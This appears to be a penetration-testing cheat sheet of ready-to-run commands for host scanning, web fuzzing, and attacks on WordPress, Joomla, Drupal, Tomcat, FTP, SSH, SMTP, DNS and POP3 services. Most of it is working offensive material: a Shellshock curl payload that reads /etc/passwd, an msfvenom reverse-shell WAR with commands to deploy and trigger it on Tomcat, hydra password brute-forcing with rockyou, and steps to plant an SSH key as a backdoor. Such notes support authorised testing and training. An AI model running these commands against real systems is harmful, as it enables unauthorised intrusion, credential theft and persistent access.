# -- Nmap Scans --
# If you are not getting results then use the -Pn flag (treat hosts as live).
sudo nmap -sn <IP>/<CIDR> # Scan for hosts in the network without port scan.
sudo nmap -sC -sV -O -oA <Name>.tcp <Target-IP-Address> -v # Scans the top tcp ports
sudo nmap -sU -oA <Name>.udp <Target-IP-Address> # Scans the top UDP ports
# After these are done run again but for all ports using the flag (-p-)
python3 autorecon.py <IP-Address> <Output-File> # Run auto recon to automate various enumeration steps
2. Web Attacks
Web General Tips
View source-code and identify any hidden content.
Check for robots.txt
Add hosts to /etc/hosts
Start fuzzing
Conduct vulnerability scanning using nikto
Check the SSL certificate for subdomains or usernames
If there is any login page then try default credentials or/and bruteforce it
If there is any file upload functionality then check where it's reflected
Check any input fields to injection attacks
If you found cgi-bin then fuzz further and try shellshock.
Sometimes you might be able to exploit a file upload vulnerability but then you don't have the permission to create a directory, in such cases, try using an existing directory.
Wordpress
Check /wp-content/uploads
Check the config file (wp-config.php)
Check if there are users to bruteforce
Run wp-scan
Joomla
Check if there are users to bruteforce
Run joomscan/droopescan/joomlavs
Drupal
Enumerate usersnames by testing on /user/register or /user/<Number>
Fuzz /node/<Number> to detect pages that might have not been noticed
If the version is less than 8 then you can inject PHP code
Tomcat
Try to access /manager/html from there you can upload war files (shell) However, the path is protected by basic http auth.
Try default credentials
Run a bruteforce attack
nikto -h <Target> # Target scanning using nikto.
# -- Fuff Fuzzing --
# Directory discovery
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://<Target>/FUZZ/ -v
# Extension Fuzzing
ffuf -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt:FUZZ -u http://<Target>/indexFUZZ
# Page Fuzzing
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://<Target>/FUZZ.php
# Recursive Fuzzing
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://<Target>/FUZZ -recursion -recursion-depth 1 -e .<Extension> -v
# Subdomain Fuzzing
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u https://FUZZ.<Target>/
# Vhost Fuzzing
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://<Target>/ -H 'Host: FUZZ.<Target>' -fs <Value-To-Exclude>
# GET Parameter Fuzzing
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://<Target>?FUZZ=key -fs <Value-To-Exclude>
# POST Parameter Fuzzing
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u <Target> -X POST -d 'FUZZ=key' -H 'Content-Type: application/x-www-form-urlencoded' -fs <Value-To-Exclude>
# POST Value Fuzzing
ffuf -w <Wordlist>:FUZZ -u <Target> -X POST -d '<Parameter>=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fs <Value-To-Exclude>
# CGI Fuzzing
ffuf -w /usr/share/seclists/Discovery/Web-Content/CGI-XPlatform.fuzz.txt -u <Target>/ccgi-bin/FUZZ
ffuf -w /usr/share/seclists/Discovery/Web-Content/CGIs.txt -u <Target>/ccgi-bin/FUZZ
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u <Target>/cgi-bin/FUZZ -e .sh,.pl,.cgi
# If a script is found then try:
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" <Target>/cgi-bin/<Script>
# -- WordPress WPScan --
wpscan --url <Target> --enumerate u,ap,t -v -o <Target>.txt # Enumerate Scan
wpscan --url <Target> --passwords /usr/share/wordlists/rockyou.txt --usernames <Comma-Separated-Usernames> # Password Bruteforcing attack
eyewitness --web -x <Nmap-Output>.xml -d <Output-Directory> # Takes the output of nmap to produce a report with photos for each website.
cat <Nmap-Output>.xml | ./aquatone -nmap # Takes the output of nmap to produce a report with photos for each website.
# -- Joomla Commands --
droopescan scan joomla --url <Target> # Scan for Joomla vulnerabilities.
sudo python3 joomla-brute.py -u <Target> -w -usr <Username> # Password Bruteforcing attack (https://github.com/ajnik/joomla-bruteforce)
joomscan -u <Target> # Scan for vulnerabilities.
# -- Drupal --
droopescan scan drupal -u <Target> # Scan for vulnerabilities.
wfuzz -c -z range,1-500 --hc 404 <Target>/node/FUZZ # Fuzz for pages
# -- Tomcat --
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP-Address> LPORT=<Port-Number> -f war > <Filename>.war # Generate a war shell to upload to Tomcat.
wget 'http://<Username>:<Password>@<Target>/manager/deploy?war=file:<Filename>&path=/shell' -O - # Uploads the shell for Tomcat6
curl -v -u <Username>:<Password> -T <Filename> 'http://<Target>/manager/text/deploy?path=/shellh&update=true' # Uploads the shell for Tomcat 7 and above.
curl http://<Target>/shell/ # Execute the shell.
# -- HTTP Bruteforce Attacks --
sudo hydra -l <Username> -P <Target> http-post-form "<Login-URI>:<Username-Parameter-Name>=^USER^&<Password-Parameter-Name>=^PASS^:<Failed-Message>" -V
3. Network Protocls/Attacks (In Progress)
FTP - 21
Check for anonymous access
Download or upload files (config files, ssh keys, etc/passwd, etc.)
Bruteforce users
ftp <IP-Address> # Interact with the server
PASSIVE
BINARY
GET <File> # Download a file
PUT <File> # Upload a file
sudo hydra -l <Username> -P /usr/share/wordlists/rockyou.txt ftp://<IP-Address>
SSH - 22
Bruteforce users
Upload a key as a backdoor
ssh <Username>@<IP-Address> # Connect using username & password
ssh -i <SSH-Key> <User>@<IP-Address> # Connect using the key
chmod 600 <SSH-Key> # Permissions required for the key
sudo hydra -l <Username> -P /usr/share/wordlists/rockyou.txt ssh://<IP-Address> # Bruteforce attack
# -- Exploit using key as a backdoor --
ssh-keygen -f <Filename>
chmod 600 <Filename>
echo <Filename>.pub >> <Target>/.ssh/authorized_keys
SMTP - 25
Check for users
nc -nv <IP-Address> 25 # To detect the version
smtp-user-enum -M <Mode> -U <Users-Wordlist> -t <IP-Address> # Mode can be any of RCPT, VRFY, EXPN
DNS - 53
Try zone transfer
Enumerate the subdomains for more targets
sudo sh -c 'echo "<Server-IP> <Domain-Name>" >> /etc/hosts' # Add DNS entry to hosts
dnsenum <Domain>
dnsrecon -d <Domain> -a
dig axfr <Domain> @<Name-Server>
POP3 - 110
Enumerate users
Bruteforce users
Read emails
# Steps to read an email
telnet <IP-Address> 110
USER <Username>
PASS <Password>
LIST
RETR <Mail-ID>
QUIT
hydra -l <Email-Address> -P /usr/share/wordlists/rockyou.txt pop3://<IP-Address> -t 10 # Bruteforce user
